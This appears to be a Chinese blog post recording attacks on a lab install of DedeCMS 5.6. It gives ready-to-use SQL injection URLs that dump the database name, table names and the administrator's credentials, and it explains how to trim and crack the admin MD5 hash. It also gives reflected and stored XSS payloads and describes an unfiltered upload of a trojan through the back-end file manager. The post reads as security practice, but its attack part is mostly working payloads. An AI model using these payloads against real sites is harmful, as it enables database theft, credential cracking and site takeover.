zoukankan      html  css  js  c++  java
  • dedecms5.6漏洞尝试

    0x00 SQL注入漏洞

    SQL注入漏洞1

    注入点:http://192.168.1.130/member/buy_action.php?product=
    完整payload:

    http://192.168.1.130/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select database()),(select 1),'4
    

    访问http://192.168.1.130/member/operation.php 查询出信息
    当前数据库信息dedecmsv56gbk

    http://192.168.1.130/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select table_name from information_schema.tables where table_schema=database() LIMIT 7,1),(select 1),'4
    

    查出表名 dede_admin

    http://192.168.1.130/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select column_name from information_schema.columns where table_name=0x646564655f61646d696e LIMIT 6,1),(select 1),'4
    

    图片1 sql注入漏洞1

    SQL注入漏洞2

    注入点:http://192.168.1.130/member/mystow.php?type=book'
    Payload:http://192.168.1.130/member/mystow.php?type=book' union select 1,2,3,database(),5,6,7,8,9%23

    图片2 sql注入漏洞2
    ####SQL注入漏洞3 参考链接http://wooyun.tangscan.cn/static/bugs/wooyun-2014-063441.html 注册用户在笔名中添加如下字符 ``` ',char(@`'`),0,0,database(),0,0)# ``` 然后添加一个好友 触发数据库查询,再回到我的织梦中即可看到查询出的数据 ![](http://images2015.cnblogs.com/blog/796790/201703/796790-20170318114207416-1990673892.png)
    图片3 sql注入漏洞3
    ####SQL注入漏洞4 参考链接:http://wooyun.tangscan.cn/static/bugs/wooyun-2014-052214.html 注入点: `http://192.168.1.130/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=` 漏洞利用payload ``` http://192.168.1.130/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 ``` ![](http://images2015.cnblogs.com/blog/796790/201703/796790-20170318114220979-528169713.png)
    图片4 sql注入漏洞4
    如果是32位MD5减去头5位,减去尾七位 如果是20位MD5密码,前减3后减1,得到16位MD5 将得到的23a7bbd73250516f069d处理后得到7bbd73250516f069,放到cmd5解密得到admin的密码为admin123

    0x01 Xss漏洞

    Xss漏洞1:

    完整payload:
    http://192.168.1.130/plus/recommend.php?aid=1&action=sendmail&title=%3Cscript%3Ealert%281%29%3C/script%3E
    漏洞证明:

    图片5 xss漏洞1
    ####XSS漏洞2 参考链接: http://wooyun.tangscan.cn/static/bugs/wooyun-2014-065561.html 普通用户申请友情链接,在网站logo处添加 ``` '" onerror=alert(1);// ``` ![](http://images2015.cnblogs.com/blog/796790/201703/796790-20170318114330916-1469584272.png)
    图片6 xss漏洞2填写信息
    触发条件:后台管理员登陆查看友情链接申请触发xss 漏洞证明: ![](http://images2015.cnblogs.com/blog/796790/201703/796790-20170318114341135-764123419.png)
    图片7 xss漏洞2触发证明

    0x02文件上传漏洞

    1,在后台页面文件式管理处,点击上传文件,直接上传木马,没有过滤。

    图片8 文件上传漏洞点
  • 相关阅读:
    【分布式】Zookeeper会话
    【分布式】Zookeeper客户端
    【分布式】Zookeeper序列化及通信协议
    【分布式】Zookeeper系统模型
    【分布式】Zookeeper在大型分布式系统中的应用
    【分布式】Zookeeper应用场景
    【分布式】Zookeeper使用--开源客户端
    【分布式】Zookeeper使用--Java API
    【分布式】Zookeeper使用--命令行
    【杂文】从实习到校招到工作
  • 原文地址:https://www.cnblogs.com/moonnight/p/6572599.html
Copyright © 2011-2022 走看看